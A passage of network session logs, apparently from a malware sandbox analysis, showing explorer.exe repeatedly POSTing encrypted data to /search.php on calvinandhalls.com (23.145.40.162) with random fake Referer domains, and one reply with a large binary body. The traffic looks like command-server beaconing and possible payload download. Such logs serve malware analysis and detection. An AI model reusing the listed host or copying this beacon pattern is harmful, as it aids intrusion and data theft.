2024-10-03 00:53:20 UTC	285	OUT	Data Raw: 72 19 f5 bf 8c 0c 1d 8c 6c f4 9d 6a 4a f7 15 2c db f7 b7 d5 65 79 31 f9 72 07 b3 96 e8 a4 33 e8 7d 9b b7 f2 75 8d ad 84 81 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 68 34 01 83 b7 25 93 3c 42 bb 3a a7 b7 f8 30 58 d6 65 21 b2 35 94 9d 11 1d fc 13 26 70 af ba d6 68 b0 c1 53 6e e4 fc 38 ab 3d 3e a4 c1 0b 2f 55 0d 2c 32 ca 03 b2 c8 8c 2f dd a6 33 10 2d f5 6e 49 cf 49 03 e9 82 8e db 56 32 b8 0a ca 32 b9 60 6a d8 51 b9 30 20 2a 25 11 f3 e7 4b a7 cf 6d d3 55 6f ca e6 92 13 c1 fc 59 bc ae ee 8c 0d 2b c2 c3 d2 67 51 90 4f 39 96 29 57 37 e4 3d 26 57 d3 50 69 06 eb b2 8b 1c 6a c7 e6 72 bf 53 86 c5 a0 63 11 07 66 cb 6f 3d 4a 33 34 b5 2e fd d5 6f 11 20 5e 2a 8c b5 72 5f 09 55 85 c6 c9 15 f3 f8 29 e7 2d 82 e4 d7 b0 17 c9 45 Data Ascii: rljJ,ey1r3}u )6IP g3iqH[@Lh4%<B:0Xe!5&phSn8=>/U,2/3-nIIV22`jQ0 %KmUoY+gQO9)W7=&WPijrScfo=J34.o ^r_U)-E
2024-10-03 00:53:20 UTC	278	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 00:53:20 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 0 Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49772	23.145.40.162	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 00:53:21 UTC	287	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://ewclkpfbrsdjk.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 252 Host: calvinandhalls.com
2024-10-03 00:53:21 UTC	252	OUT	Data Raw: 72 19 f5 bf 8c 0c 1d 8c 6c f4 9d 6a 4a f7 15 2c db f7 b7 d5 65 79 31 f9 72 07 b3 96 e8 a4 33 e8 7d 9b b7 f2 75 8d ad 84 81 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 69 34 01 83 b7 25 93 3c 62 ca 62 fb 98 b7 5e 59 c6 0f 1a 99 58 9b 94 2a 18 ca 13 36 22 88 cc d6 44 d2 b4 12 03 8c f0 2c 90 4e 3a e8 d5 0a 7b 59 1f 3d 3d dc 12 aa ee d3 04 ff e7 75 0d 20 82 08 08 d4 49 68 90 f6 97 c0 46 6c bf 78 c8 3f af 73 3d b9 3f cb 7a 23 3b 10 64 d4 e3 68 fc a6 28 d8 0e 73 86 e1 95 4e da 81 78 b9 9e 96 d5 33 37 ae dc c9 50 41 c4 76 26 db 0a 03 24 9f 45 68 5f cd 54 19 2e db a0 e2 7f 51 80 f8 0f 9d 7c f8 c6 c8 1b 00 01 22 c3 1a 0d 57 5a 16 b8 5a ed c8 26 14 1f 7b 1e e3 92 67 79 08 5a c5 84 fb 41 cd bf 1e e6 44 a8 ea b8 f1 Data Ascii: rljJ,ey1r3}u )6IP g3iqH[@Li4%<bb^YX*6"D,N:{Y==u IhFlx?s=?z#;dh(sNx37PAv&$Eh_T.Q\|"WZZ&{gyZAD
2024-10-03 00:53:21 UTC	278	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 00:53:21 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 0 Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49773	23.145.40.162	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 00:53:22 UTC	287	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://uiidyxwxtxdyi.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 188 Host: calvinandhalls.com
2024-10-03 00:53:22 UTC	188	OUT	Data Raw: 72 19 f5 bf 8c 0c 1d 8c 6c f4 9d 6a 4a f7 15 2c db f7 b7 d5 65 79 31 f9 72 07 b3 96 e8 a4 33 e8 7d 9b b7 f2 75 8d ad 84 81 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6e 34 01 83 b7 25 93 3c 33 d1 65 a3 b8 cd 3d 15 f6 60 7d 84 69 dc 93 64 61 fc 05 0c 62 af e4 f0 23 da a5 73 5f f0 87 63 8d 36 25 96 ee 1a 1b 36 55 31 3b d8 1b a4 91 d2 35 c9 b7 46 35 28 ee 57 0b a1 2d 6c dd ec af bf 49 78 c6 0e bf 23 ec 0f 66 c5 31 c4 3d 7b 24 2f 48 d0 db 07 b3 a7 1f 86 43 69 d2 c3 be 54 da ef 64 81 b1 ab 86 0b 54 c7 c3 cb 79 50 9a 3b Data Ascii: rljJ,ey1r3}u )6IP g3iqH[@Ln4%<3e=`}idab#s_c6%6U1;5F5(W-lIx#f1={$/HCiTdTyP;
2024-10-03 00:53:22 UTC	278	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 00:53:22 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 0 Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49774	23.145.40.162	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 00:53:23 UTC	289	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://uoltcvkhemeklfe.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 328 Host: calvinandhalls.com
2024-10-03 00:53:23 UTC	328	OUT	Data Raw: 72 19 f5 bf 8c 0c 1d 8c 6c f4 9d 6a 4a f7 15 2c db f7 b7 d5 65 79 31 f9 72 07 b3 96 e8 a4 33 e8 7d 9b b7 f2 75 8d ad 84 81 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6f 34 01 83 b7 25 93 3c 55 a9 1a e8 d8 c0 11 25 c6 77 23 b5 75 fa cc 71 76 c0 39 3f 39 c1 bb fc 23 ac e9 1e 4f 8b 9d 2b 8b 43 4b ad ee 57 31 39 6e 50 3b c2 18 97 db 9d 2e eb e3 49 0d 1d 8d 16 39 dd 4a 66 d7 ea e0 d7 2a 26 d2 15 cf 67 8c 35 5a be 3f dc 3a 3e 4f 78 47 a5 af 16 fb ca 72 de 02 68 c3 a6 ba 0a b3 f2 7f 92 ca b0 b5 05 30 c9 d5 92 6b 49 93 49 4d 8e 36 6b 38 b7 7b 15 54 a5 4f 17 18 9c d4 c2 70 6e d8 ac 21 fc 76 ec af bf 33 17 1b 5a dc 63 76 63 1f 0c aa 4c 8d 9d 72 11 26 2c 3a fe 87 39 6e 1d 2c ba 96 c8 4b e8 f3 0c eb 63 9f e4 d0 c7 00 b8 47 Data Ascii: rljJ,ey1r3}u )6IP g3iqH[@Lo4%<U%w#uqv9?9#O+CKW19nP;.I9Jf*&g5Z?:>OxGrh0kIIM6k8{TOpn!v3ZcvcLr&,:9n,KcG
2024-10-03 00:53:23 UTC	278	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 00:53:23 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 0 Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49775	23.145.40.162	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 00:53:24 UTC	290	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://ncagifvdvfuwwfnn.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 124 Host: calvinandhalls.com
2024-10-03 00:53:24 UTC	124	OUT	Data Raw: 72 19 f5 bf 8c 0c 1d 8c 6c f4 9d 6a 4a f7 15 2c db f7 b7 d5 65 79 31 f9 72 07 b3 96 e8 a4 33 e8 7d 9b b7 f2 75 8d ad 84 81 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6c 34 01 83 b7 25 93 3c 56 aa 19 96 be f4 04 17 c4 0c 72 b4 25 d2 8f 79 05 c8 0b 3a 73 af c8 c2 33 bb d8 4d 5e f2 e9 57 e7 53 20 ec c1 09 08 4e 66 39 5c 89 13 f8 Data Ascii: rljJ,ey1r3}u )6IP g3iqH[@Ll4%<Vr%y:s3M^WS Nf9\
2024-10-03 00:53:24 UTC	278	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 00:53:24 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 0 Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49776	23.145.40.162	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 00:53:25 UTC	289	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://wwdeekjiqyviexo.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 249 Host: calvinandhalls.com
2024-10-03 00:53:25 UTC	249	OUT	Data Raw: 72 19 f5 bf 8c 0c 1d 8c 6c f4 9d 6a 4a f7 15 2c db f7 b7 d5 65 79 31 f9 72 07 b3 96 e8 a4 33 e8 7d 9b b7 f2 75 8d ad 84 81 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6d 34 01 83 b7 25 93 3c 50 ca 7b 84 ca aa 3f 12 a1 6e 18 f8 3e 9e c6 04 21 b3 0b 50 5d d1 df d2 20 e9 cf 7e 08 f8 b4 30 87 56 56 f6 e9 0d 28 3e 1d 40 1c fb 06 c0 9e be 10 e1 f4 6d 66 40 a8 57 2d e6 3b 0d 87 8f e2 cf 2d 64 86 6d d4 4d a1 0d 43 b0 20 d4 55 51 32 7c 15 c4 e3 1f e1 c5 37 cb 0c 3a 83 d2 db 04 c4 e8 6a 82 c9 e7 91 45 71 af de d9 1a 17 c1 4f 1a c9 0b 42 4f 90 7f 61 36 af 16 33 51 c6 ae 86 10 7d c0 e9 7d e1 55 cf c7 be 6b 73 61 27 f8 7b 04 79 3c 6e a7 51 9f 91 26 4d 64 72 59 81 e3 6e 3c 30 1f d8 f0 87 4f 82 b2 04 cf 4f e6 Data Ascii: rljJ,ey1r3}u )6IP g3iqH[@Lm4%<P{?n>!P] ~0VV(>@mf@W-;-dmMC UQ2\|7:jEqOBOa63Q}}Uksa'{y<nQ&MdrYn<0OO
2024-10-03 00:53:25 UTC	278	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 00:53:25 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 0 Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49777	23.145.40.162	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 00:53:26 UTC	287	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://kosstmcfnhuhw.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 237 Host: calvinandhalls.com
2024-10-03 00:53:26 UTC	237	OUT	Data Raw: 72 19 f5 bf 8c 0c 1d 8c 6c f4 9d 6a 4a f7 15 2c db f7 b7 d5 65 79 31 f9 72 07 b3 96 e8 a4 33 e8 7d 9b b7 f2 75 8d ad 84 81 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 62 34 01 83 b7 25 93 3c 75 d9 08 8e aa c5 54 0f c3 7a 00 89 5f e4 e2 28 67 d5 1a 51 3b dc e5 d6 29 a6 fc 79 08 84 a1 6b bb 61 3d ba fa 62 38 44 1d 0f 0b 8f 0a c6 e9 aa 28 fc e9 4c 14 2a a7 6a 02 cf 58 4b d7 fa 88 d4 5f 08 c9 14 d8 49 9d 0d 4a 9f 2f ba 44 24 42 28 7c f7 da 0f f0 92 64 99 11 2a e3 cc cd 52 e8 9f 68 ee b3 a1 ad 42 64 ab 8f de 11 22 9b 62 54 8e 02 76 2e a0 7f 35 53 d3 06 24 2b d6 b4 df 1d 60 9f be 0e f7 77 ca e4 ef 7e 23 76 6f a9 5a 64 6e 09 03 c9 20 ef db 15 52 28 5a 16 db 85 73 0e Data Ascii: rljJ,ey1r3}u )6IP g3iqH[@Lb4%<uTz_(gQ;)yka=b8D(LjXK_IJ/D$B(\|dRhBd"bTv.5S$+`w~#voZdn R(Zs
2024-10-03 00:53:26 UTC	278	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 00:53:26 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 0 Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49778	23.145.40.162	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 00:53:27 UTC	289	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://ydofwygotpmmcts.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 116 Host: calvinandhalls.com
2024-10-03 00:53:27 UTC	116	OUT	Data Raw: 72 19 f5 bf 8c 0c 1d 8c 6c f4 9d 6a 4a f7 15 2c db f7 b7 d5 65 79 31 f9 72 07 b3 96 e8 a4 33 e8 7d 9b b7 f2 75 8d ad 84 81 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 63 34 01 83 b7 25 93 3c 4e c9 18 ff ce eb 3f 20 d5 0d 33 fb 3e 9a f7 3d 06 c3 70 37 4e b7 fa c7 35 d3 fa 10 55 98 b8 72 98 58 59 e1 99 3f Data Ascii: rljJ,ey1r3}u )6IP g3iqH[@Lc4%<N? 3>=p7N5UrXY?
2024-10-03 00:53:27 UTC	278	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 00:53:27 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 0 Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49779	23.145.40.162	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 00:53:28 UTC	288	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://nojnvrwehyneiu.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 219 Host: calvinandhalls.com
2024-10-03 00:53:28 UTC	219	OUT	Data Raw: 72 19 f5 bf 8c 0c 1d 8c 6c f4 9d 6a 4a f7 15 2c db f7 b7 d5 65 79 31 f9 72 07 b3 96 e8 a4 33 e8 7d 9b b7 f2 75 8d ad 84 81 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 60 34 01 83 b7 25 93 3c 2e ce 2a e4 8e f4 4e 27 fd 6d 30 b9 40 c3 c9 65 20 ae 2f 38 63 a2 d1 94 50 f3 fb 6e 18 e7 e5 32 fa 21 56 f1 c6 79 18 2f 64 28 2a fb 6f bb 9f ad 1d cb 98 5f 10 45 e4 16 54 d5 2c 1c ec e1 93 b7 1c 30 88 59 d3 42 f3 03 7d ce 48 ca 6d 5a 6a 02 63 a9 c2 66 eb b3 74 f2 5e 15 ea d0 b7 57 ea 81 74 85 a6 aa cf 1a 21 df ae 80 7e 05 ba 5a 41 cf 2d 7c 09 ba 4c 60 21 ff 2a 29 13 e4 cf 89 64 39 c2 aa 30 bd 62 88 b8 fd 28 1a 2c 7f 97 Data Ascii: rljJ,ey1r3}u )6IP g3iqH[@L`4%<.N'm0@e /8cPn2!Vy/d(o_ET,0YB}HmZjcft^Wt!~ZA-\|L`!*)d90b(,
2024-10-03 00:53:28 UTC	278	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 00:53:28 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 0 Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49780	23.145.40.162	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 00:53:29 UTC	286	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://qnsgnjmmwemj.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 212 Host: calvinandhalls.com
2024-10-03 00:53:29 UTC	212	OUT	Data Raw: 72 19 f5 bf 8c 0c 1d 8c 6c f4 9d 6a 4a f7 15 2c db f7 b7 d5 65 79 31 f9 72 07 b3 96 e8 a4 33 e8 7d 9b b7 f2 75 8d ad 84 81 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 61 34 01 83 b7 25 93 3c 67 c2 15 90 82 be 08 11 ee 34 06 ee 3e ea 84 31 2c c4 13 16 33 d7 a4 ee 32 b7 b6 00 78 ea 9f 57 e6 34 4f a6 dc 4a 15 4c 4a 05 3d 9a 6a 9b f2 a3 48 cf 8a 49 0b 56 ac 1f 3c f6 21 77 cd e5 e9 ac 46 37 ce 54 da 7d 82 65 21 b3 4f a8 4a 68 78 76 19 ab e4 12 f3 c7 1f e2 32 3c e3 d3 9c 4a bd ef 6b e6 94 8a c2 32 66 9f a4 aa 4c 47 8b 64 4d e7 05 12 0d a2 3f 10 7e aa 39 67 3b fd 96 98 2f 56 bb b9 1f a5 48 aa Data Ascii: rljJ,ey1r3}u )6IP g3iqH[@La4%<g4>1,32xW4OJLJ=jHIV<!wF7T}e!OJhxv2<Jk2fLGdM?~9g;/VH
2024-10-03 00:53:29 UTC	278	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 00:53:29 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 0 Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49781	23.145.40.162	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 00:53:29 UTC	289	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://wehtacgjvfsaxou.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 240 Host: calvinandhalls.com
2024-10-03 00:53:29 UTC	240	OUT	Data Raw: 72 19 f5 bf 8c 0c 1d 8c 6c f4 9d 6a 4a f7 15 2c db f7 b7 d5 65 79 31 f9 72 07 b3 96 e8 a4 33 e8 7d 9b b7 f2 75 8d ad 84 81 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 66 34 01 83 b7 25 93 3c 4a fc 3f 80 b6 ab 29 5a fd 73 32 87 4e f6 fa 35 0c e3 10 15 50 c0 e0 f3 5f d6 ff 59 47 8c 96 40 b2 70 3a ef e1 4f 3d 74 73 5a 5b c7 18 d5 ef ba 26 c1 9d 7d 35 24 9f 5b 20 ef 59 5f ce ca 97 c4 39 34 81 5d e2 7a b9 33 24 b5 3b ba 2f 79 59 6b 65 b8 ab 16 9b b2 7e dd 50 68 99 b8 8e 3b cd bf 0a fb b8 ef a5 44 74 b3 bb ab 08 55 de 5c 3b 98 11 49 5e be 2f 17 48 ad 50 76 30 f7 93 ef 75 27 9c c9 7f b4 53 80 fa d4 0b 06 78 51 aa 68 6a 15 21 3b bc 06 bb 80 16 54 0e 72 05 d0 9e 7b 55 5a 33 ff Data Ascii: rljJ,ey1r3}u )6IP g3iqH[@Lf4%<J?)Zs2N5P_YG@p:O=tsZ[&}5$[ Y_94]z3$;/yYke~Ph;DtU\;I^/HPv0u'SxQhj!;Tr{UZ3
2024-10-03 00:53:30 UTC	294	IN	HTTP/1.1 404 Not Found Date: Thu, 03 Oct 2024 00:53:30 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Type: text/html; charset=utf-8 Connection: close Transfer-Encoding: chunked
2024-10-03 00:53:30 UTC	7898	IN	Data Raw: 31 65 65 37 0d 0a 00 00 b5 50 0f 6d f7 61 d7 e7 49 78 ba 09 bf db 6e 5b 92 64 4f 0c f1 aa 5d 78 6e 1d 37 6e a3 bf 51 b7 61 50 c8 4c 75 ec 96 6c 61 47 6f 72 d9 5d 28 4a c9 17 cf ae b0 92 75 82 7c d6 cc 92 b4 cc 04 6e 80 d9 27 08 88 90 7c 25 38 3b 06 b0 d9 98 1f b3 ee 24 b2 8e 94 c4 c7 84 78 7f df ff 07 32 07 d4 23 b4 c2 cf a3 d9 18 29 4c b6 6d 7e 16 31 ba 88 9c 6f 27 9e 77 77 ec 42 27 39 f1 c8 b5 0f 2b 2c 37 f5 27 0c ee 96 8c 2c eb 7f 13 2a 58 0b a1 c6 4a a5 04 a5 ee 06 88 e3 1d 96 d0 4c d7 1a 1c 0b 6e 31 a2 fd 08 4f 89 d7 29 16 31 bd a7 21 aa 5c b5 b5 55 45 44 dc a1 75 85 c1 e8 06 3a f3 80 41 02 4f fe 76 f4 a8 10 4e 8c 77 26 ec 91 05 1d da 3e 11 60 70 e2 86 3d ef 6e dd fe db a9 55 d9 c9 88 8a 82 ba 08 34 ee fb c7 34 41 b5 cd 3a 1d 0c d7 46 85 07 8f 3d 07 Data Ascii: 1ee7PmaIxn[dO]xn7nQaPLulaGor](Ju\|n'\|%8;$x2#)Lm~1o'wwB'9+,7',*XJLn1O)1!\UEDu:AOvNw&>`p=nU44A:F=
2024-10-03 00:53:30 UTC	19	IN	Data Raw: 1a 58 b2 14 d1 ff ef 1b ab d4 44 9e af 19 24 1b 3c de a6 Data Ascii: XD$<
2024-10-03 00:53:30 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-10-03 00:53:30 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 4f b0 ac 7b 5b 94 2f 8e fb a5 49 75 0f 40 51 70 86 33 86 ea 54 c2 9c a9 b3 9c cf 10 ce 73 f3 0a 45 73 70 80 bd cf 7c c6 1c 25 20 f0 db 31 01 72 f0 5d 54 16 83 19 c9 78 43 66 d9 c7 7f 47 ca 0f f7 a2 70 1e 62 4f 97 d4 85 58 23 aa d0 91 09 29 ee 80 ff 8b 54 15 25 28 bd e0 44 37 f5 d2 98 eb 0f e0 d6 36 42 df 9d 30 3b 76 0a 49 8d d8 2a 5a 2c 48 85 64 39 6f df 29 ee ea 49 62 42 61 fc 57 6e 83 9a b6 22 77 a6 6b e0 cf c9 e4 7a 54 6a 49 6b 6f 35 b7 56 48 95 56 16 b2 96 49 9e ba 4c 2c 9b 9c 43 42 13 5b a3 ab 34 c0 82 5d a9 9e 70 45 78 63 d2 8a a7 06 b3 53 cc e2 23 f1 5f eb 82 a9 0c ba 27 c8 99 eb 5e 0c 15 68 6c d4 ae e1 12 2f 24 0c 48 6d a6 03 50 bc 8c c8 19 7b 50 c9 e8 5e 04 70 28 b9 77 49 81 50 c8 50 6b ae b4 0b 13 a5 ca 64 4c e6 f3 cd d4 f6 e4 Data Ascii: 2000O{[/Iu@Qp3TsEsp\|% 1r]TxCfGpbOX#)T%(D76B0;vI*Z,Hd9o)IbBaWn"wkzTjIko5VHVIL,CB[4]pExcS#_'^hl/$HmP{P^p(wIPPkdL
2024-10-03 00:53:30 UTC	6	IN	Data Raw: 4e 13 8c ae b0 c6 Data Ascii: N
2024-10-03 00:53:30 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-10-03 00:53:30 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 37 b1 80 d9 81 f6 4a 57 1f 8f 04 5f c4 c1 88 46 ee 18 f5 d8 fe a1 a3 c6 ae 36 1a 9c e0 fa 7a 50 95 22 b4 51 4c 25 b1 f4 18 0d 15 d0 06 0a 15 7b 22 d8 b8 63 41 09 53 8a 61 25 04 92 dd b9 c8 34 da 29 b1 d3 b5 7c 9b b7 ff 21 7f 68 a2 a1 99 ca f2 df ce 53 bb f5 67 4b 05 db de 01 f7 41 65 c4 8c 62 3c 94 b8 4a 79 8f 0f fc ed 98 91 1c 6c 74 27 cb 44 8c b3 ad 55 8f 66 a4 df a5 4c f4 c9 c1 69 5d 48 0b 4f 32 71 7a 52 6c c0 39 48 fa 96 d0 c8 ec f4 9c a0 0a 28 2c 0e 70 0f 5f 56 3f 57 12 a8 f7 ec d3 73 0d 42 60 a6 37 ca 65 e1 1c 43 c8 32 77 4f a8 25 84 73 8c 57 fe fd 9b 22 07 c9 76 66 b6 ee 85 11 52 c9 be 4e b1 d6 66 9c d8 30 3f 8d 93 5a f4 d5 f2 5f 31 3d a5 2f 45 84 49 21 aa 61 87 37 f6 f5 9a 70 4c 4c f9 1d fb e1 fe d1 ef cb f9 05 71 1e 89 dd 8a 35 Data Ascii: 20007JW_F6zP"QL%{"cASa%4)\|!hSgKAeb<Jylt'DUfLi]HO2qzRl9H(,p_V?WsB`7eC2wO%sW"vfRNf0?Z_1=/EI!a7pLLq5
2024-10-03 00:53:30 UTC	6	IN	Data Raw: eb 47 a6 2d 95 51 Data Ascii: G-Q
2024-10-03 00:53:30 UTC	2	IN	Data Raw: 0d 0a Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49782	23.145.40.162	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 00:53:31 UTC	285	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://mlgxdfcmbix.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 349 Host: calvinandhalls.com
2024-10-03 00:53:31 UTC	349	OUT	Data Raw: 72 19 f5 bf 8c 0c 1d 8c 6c f4 9d 6a 4a f7 15 2c db f7 b7 d5 65 79 31 f9 72 07 b3 96 e8 a4 33 e8 7d 9b b7 f2 75 8d ad 84 81 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 41 4c 66 34 01 83 b6 25 93 3c 58 d9 7c ec d5 a9 54 13 f0 30 1a 9a 5c c5 da 3c 07 e5 19 1b 2d 90 b2 f4 24 c2 b8 76 1a 89 ec 4a 9a 60 5b 9e c4 0a 12 41 79 53 45 cc 3e b0 84 db 12 eb b3 38 7b 45 8c 0c 25 f7 54 13 da 82 fc ba 0d 74 80 46 d5 7f ad 39 5c 92 56 cb 64 7d 5d 07 41 ad e9 01 f9 a4 09 97 5b 6c e3 e2 cc 5d b9 86 55 86 96 ed b7 5c 70 bd d1 92 40 23 95 4f 0c d6 1e 63 57 fd 6c 77 49 ac 33 17 0e ea a8 cf 14 6a 98 cc 15 b5 49 f5 c7 b0 11 62 75 